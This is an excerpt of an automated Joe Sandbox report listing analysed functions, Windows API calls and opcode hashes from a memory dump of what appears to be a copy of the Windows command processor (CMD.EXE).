                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CloseFind
                                        • String ID:
                                        • API String ID: 1863332320-0
                                        • Opcode ID: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                        • Instruction ID: a9b7e0f9473ee52b1cfe05e8179391b8a0633f4ce090532370eea9bf2546af7d
                                        • Opcode Fuzzy Hash: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                        • Instruction Fuzzy Hash: E101C420F0CA4396E714BF16A444979FAA7EF85B60BD89030DF2D82654FE2CF6928310
                                        Function 00007FF7CD499A6C Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Concurrency::cancel_current_taskmalloc
                                        • String ID:
                                        • API String ID: 1412018758-0
                                        • Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                        • Instruction ID: 02aa12de019a37a8b458d10e0604f4885602a00dc45c2cf7b63cce609703c7a4
                                        • Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                        • Instruction Fuzzy Hash: 56E06D00F1E64792FE243FA36882874925E9F68760E882430CF2D09382FE2CA6918330
                                        Function 00007FF7CD48CD90 Relevance: 2.5, APIs: 2, Instructions: 30memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48B9A1,?,?,?,?,00007FF7CD48D81A), ref: 00007FF7CD48CDA6
                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48B9A1,?,?,?,?,00007FF7CD48D81A), ref: 00007FF7CD48CDBD
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$AllocProcess
                                        • String ID:
                                        • API String ID: 1617791916-0
                                        • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                        • Instruction ID: 665d4d8a76e0bd1e3be719bd5617b54233f49474fe0f463b78125bab61b63f25
                                        • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                        • Instruction Fuzzy Hash: F2F01D31B1C64286EB04AF16F844078FBA5FB89B51B989434DE6E43754EF3CE641C710
                                        Function 00007FF7CD494C1C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: exit
                                        • String ID:
                                        • API String ID: 2483651598-0
                                        • Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                        • Instruction ID: 0de905efbdc0fb956a2c68e44b535960376190e33aac867641d6b0a3cfe0dd51
                                        • Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                        • Instruction Fuzzy Hash: 54C0123070C6465BEB2C7F726455439955A5B19211F45543CCF2A81282ED28D5058A14
                                        Function 00007FF7CD495508 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: DefaultUser
                                        • String ID:
                                        • API String ID: 3358694519-0
                                        • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                        • Instruction ID: 86b24a08f6114743cff31c529974209a3cac3da26f3b4ea312e94688334b88ee
                                        • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                        • Instruction Fuzzy Hash: 2CE0C2E2F0C2638AF5543F8364457B4999BCB787B2FD44031CF2D012CA692DAA415229
                                        Function 00007FF7CD492E44 Relevance: 1.3, APIs: 1, Instructions: 29COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset
                                        • String ID:
                                        • API String ID: 2221118986-0
                                        • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                        • Instruction ID: 042905ca52286c0116e85e5b7364156340eb70640ca9f18893b4851a26261b8e
                                        • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                        • Instruction Fuzzy Hash: A8F0B421B0D78140EE54AF57B58012A92959B4CBF0B888334EF7C47BC9EE3CD5518300

                                        Non-executed Functions

                                        Function 00007FF7CD4A7F00 Relevance: 61.6, APIs: 28, Strings: 7, Instructions: 341memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A7F44
                                        • _get_osfhandle.MSVCRT ref: 00007FF7CD4A7F5C
                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A7F9E
                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A7FFF
                                        • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A8020
                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A8036
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A8061
                                        • RtlFreeHeap.NTDLL ref: 00007FF7CD4A8075
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A80D6
                                        • RtlFreeHeap.NTDLL ref: 00007FF7CD4A80EA
                                        • _wcsnicmp.MSVCRT ref: 00007FF7CD4A8177
                                        • _wcsnicmp.MSVCRT ref: 00007FF7CD4A819A
                                        • _wcsnicmp.MSVCRT ref: 00007FF7CD4A81BD
                                        • _wcsnicmp.MSVCRT ref: 00007FF7CD4A81DC
                                        • _wcsnicmp.MSVCRT ref: 00007FF7CD4A81FB
                                        • _wcsnicmp.MSVCRT ref: 00007FF7CD4A821A
                                        • _wcsnicmp.MSVCRT ref: 00007FF7CD4A8239
                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A8291
                                        • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A82D7
                                        • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A82FB
                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A831A
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A8364
                                        • RtlFreeHeap.NTDLL ref: 00007FF7CD4A8378
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A839A
                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A83AE
                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A83E6
                                        • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A8403
                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7CD4A8418
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                                        • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                        • API String ID: 3637805771-3100821235
                                        • Opcode ID: e6cb887516591751d838279dfb6f73a977c9c7224b6493b327e80fb3c94782b6
                                        • Instruction ID: cfbe3cc7852aa30d2df3946e539973b2af21d86a31baaf239b726bb3d2dacccd
                                        • Opcode Fuzzy Hash: e6cb887516591751d838279dfb6f73a977c9c7224b6493b327e80fb3c94782b6
                                        • Instruction Fuzzy Hash: 1DE18631B0CA529AE710AF66E404179FBA1FB59BA5B849134CF2E53790FF3DA605C720
                                        Function 00007FF7CD487650 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 461fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
                                        • String ID: DPATH
                                        • API String ID: 95024817-2010427443
                                        • Opcode ID: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                        • Instruction ID: 62e4c871c5ab285b35346810f93ffdcaa57cc52ed22cd8cd89e60beb153362e9
                                        • Opcode Fuzzy Hash: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                        • Instruction Fuzzy Hash: 2B128432B0C68286E764AF15A44417DF6A1FB897A4F845139EF6E57794EF3CEA00CB10
                                        Function 00007FF7CD486EE4 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 342timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Time$File$System$DateDefaultFormatInfoLocalLocaleUsermemmoverealloc
                                        • String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                        • API String ID: 1795611712-3662956551
                                        • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                        • Instruction ID: c4ffb43a4dd708b072ce748a150b20da4085b9160fc97b799ab9da3276c8643d
                                        • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                        • Instruction Fuzzy Hash: 60E1B022B0C64296E710BF65A8405BDE6A1BB897A4FD44136DF2E57695FF3CE604C320
                                        Function 00007FF7CD4AEE88 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 225COMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcsupr.MSVCRT ref: 00007FF7CD4AEF33
                                        • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AEF98
                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AEFA9
                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AEFBF
                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7CD4AEFDC
                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AEFED
                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AF003
                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AF022
                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AF083
                                        • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AF092
                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AF0A5
                                        • towupper.MSVCRT(?,?,?,?,?,?), ref: 00007FF7CD4AF0DB
                                        • wcschr.MSVCRT(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AF135
                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AF16C
                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7CD4AE964), ref: 00007FF7CD4AF185
                                          • Part of subcall function 00007FF7CD4901B8: _get_osfhandle.MSVCRT ref: 00007FF7CD4901C4
                                          • Part of subcall function 00007FF7CD4901B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7CD49E904,?,?,?,?,00000000,00007FF7CD493491,?,?,?,00007FF7CD4A4420), ref: 00007FF7CD4901D6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                                        • String ID: <noalias>$CMD.EXE
                                        • API String ID: 1161012917-1690691951
                                        • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                        • Instruction ID: 4e3c0843de50850b4fe100313f1512b8d9d8aa4f9707322f8eeeaf3b5cd027c3
                                        • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                        • Instruction Fuzzy Hash: 43919321B0DA529AFB04BF61D8040BDBAA1AF59B74F844135EF2E526D5FF3CA6458330
                                        Function 00007FF7CD481560 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 338fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Find$File$CloseFirstmemset$AttributesErrorLastNext
                                        • String ID: \\?\
                                        • API String ID: 628682198-4282027825
                                        • Opcode ID: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
                                        • Instruction ID: 29c55dba9c3ca7ba56b6056841f8851fa4b075222ca748d6f365c69e6b3eef11
                                        • Opcode Fuzzy Hash: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
                                        • Instruction Fuzzy Hash: 6EE1A321B0C682D6EB60AF25D8446F9A3A1EB547A8F844136DF6E87794FF3CE645C310
                                        Function 00007FF7CD482220 Relevance: 15.4, APIs: 10, Instructions: 368COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$BufferConsoleInfoScreen
                                        • String ID:
                                        • API String ID: 1034426908-0
                                        • Opcode ID: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                                        • Instruction ID: ab4046b07d295918f6f0631b6a6f7e8c16e93d6b0522bb4766014d40d45811ed
